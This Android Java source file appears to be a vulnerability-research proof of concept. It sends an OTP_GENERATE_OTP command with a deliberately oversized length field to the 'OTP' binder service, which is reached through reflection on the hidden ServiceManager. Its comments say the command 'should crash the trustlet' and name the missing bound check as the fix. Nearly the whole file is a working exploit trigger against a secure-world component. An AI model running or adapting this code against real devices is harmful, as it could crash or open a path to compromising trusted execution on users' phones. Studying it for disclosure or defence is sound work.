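package com.example.laginimaineb.otp;

import android.os.Bundle;
import android.os.IBinder;
import android.os.Parcel;
import android.os.RemoteException;
import android.support.v7.app.AppCompatActivity;
import android.util.Log;

import java.lang.reflect.InvocationTargetException;

/**
 * Test activity that sends one OTP_GENERATE_OTP command, carrying an oversized length
 * field, to the "OTP" binder service and logs the first int of the reply.
 *
 * <p>The service hands the command buffer on to a trustlet; the author's note is that the
 * oversized length "should crash the trustlet", i.e. the receiver uses the in-message length
 * without bounding it against the buffer it was actually given. The fix on the receiving side
 * is exactly that bound check. Nothing here parses the reply beyond the first int.
 */
public class OneWhoKNOX extends AppCompatActivity {
    /**
     * The logtag used.
     */
    private static final String LOGTAG = "OTP_TEST";

    /**
     * The name of the OTP binder service.
     */
    private static final String INTERFACE_DESCRIPTOR = "OTP";

    /** Binder transaction code used for the OTP command. */
    private static final int OTP_TRANSACTION_CODE = 2;

    /** Size of the command buffer as sent. */
    private static final int COMMAND_SIZE = 0xDA7;

    /** Offset of the length field inside the command buffer. */
    private static final int LENGTH_FIELD_OFFSET = 0x41C;

    /**
     * Sends the command once on creation and logs the outcome.
     *
     * @param savedInstanceState passed through to {@link AppCompatActivity#onCreate(Bundle)}
     */
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        // Obtain both parcels up front so the finally block can recycle them on every path;
        // the previous version only recycled them after a successful transact().
        Parcel parcel = Parcel.obtain();
        Parcel reply = Parcel.obtain();
        try {
            IBinder binder = lookupService(INTERFACE_DESCRIPTOR);
            if (binder == null) {
                // ServiceManager.getService returns null when no service is registered
                // under that name; without this check the transact() below would NPE.
                Log.e(LOGTAG, "Service not found: " + INTERFACE_DESCRIPTOR);
                return;
            }

            parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR);
            parcel.writeByteArray(buildCommand());

            // Sending the command (should crash the trustlet)
            binder.transact(OTP_TRANSACTION_CODE, parcel, reply, 0);
            Log.e(LOGTAG, "res=" + reply.readInt());
        } catch (ClassNotFoundException | NoSuchMethodException | IllegalAccessException
                | InvocationTargetException ex) {
            Log.e(LOGTAG, "Failed to dynamically load ServiceManager methods", ex);
        } catch (RemoteException ex) {
            Log.e(LOGTAG, "Failed to communicate with remote binder", ex);
        } finally {
            reply.recycle();
            parcel.recycle();
        }
    }

    /**
     * Resolves a system service by name through the hidden {@code android.os.ServiceManager}
     * API, which is not part of the public SDK and therefore reached via reflection.
     *
     * @param name the service name to look up
     * @return the service binder, or {@code null} if nothing is registered under that name
     * @throws ClassNotFoundException    if the hidden class is absent on this build
     * @throws NoSuchMethodException     if {@code getService(String)} is absent
     * @throws IllegalAccessException    if the method cannot be invoked reflectively
     * @throws InvocationTargetException if {@code getService} itself throws
     */
    private static IBinder lookupService(String name)
            throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException,
            InvocationTargetException {
        Class<?> smClass = Class.forName("android.os.ServiceManager");
        return (IBinder) smClass.getMethod("getService", String.class).invoke(null, name);
    }

    /**
     * Builds the command buffer: command id OTP_GENERATE_OTP at offset 0 and a length field
     * that is far larger than the buffer itself, whichever byte order the receiver assumes.
     *
     * @return a freshly allocated {@value #COMMAND_SIZE}-byte command buffer
     */
    private static byte[] buildCommand() {
        byte[] command = new byte[COMMAND_SIZE];

        // Setting the command to OTP_GENERATE_OTP
        command[0] = 0x02;
        command[1] = 0x00;
        command[2] = 0x00;
        command[3] = 0x00;

        // Setting the length field to something insane: 0xFF 0xFF 0x00 0x00 exceeds the
        // 0xDA7-byte buffer under either byte order, which is what the receiver must reject.
        command[LENGTH_FIELD_OFFSET] = (byte) 0xFF;
        command[LENGTH_FIELD_OFFSET + 1] = (byte) 0xFF;
        command[LENGTH_FIELD_OFFSET + 2] = (byte) 0x00;
        command[LENGTH_FIELD_OFFSET + 3] = (byte) 0x00;

        return command;
    }
}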